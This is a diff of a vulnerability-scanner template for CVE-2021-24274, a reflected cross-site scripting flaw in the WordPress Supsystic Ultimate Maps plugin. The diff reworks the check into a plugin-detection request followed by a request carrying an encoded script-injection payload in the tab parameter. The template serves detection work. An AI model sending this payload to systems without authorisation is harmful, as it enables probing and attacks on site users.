diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 2762017b15..5d5773e35a 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -2,7 +2,7 @@ id: CVE-2021-24274 info: name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting - author: dhiyaneshDK + author: DhiyaneshDK severity: medium description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute. impact: | @@ -28,19 +28,34 @@ info: vendor: supsystic product: ultimate_maps framework: wordpress - tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic + tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic,xss + +flow: http(1) && http(2) http: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/' + condition: and + + - raw: + - | + GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word + part: body words: - '' - condition: and - type: word part: header @@ -50,4 +65,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950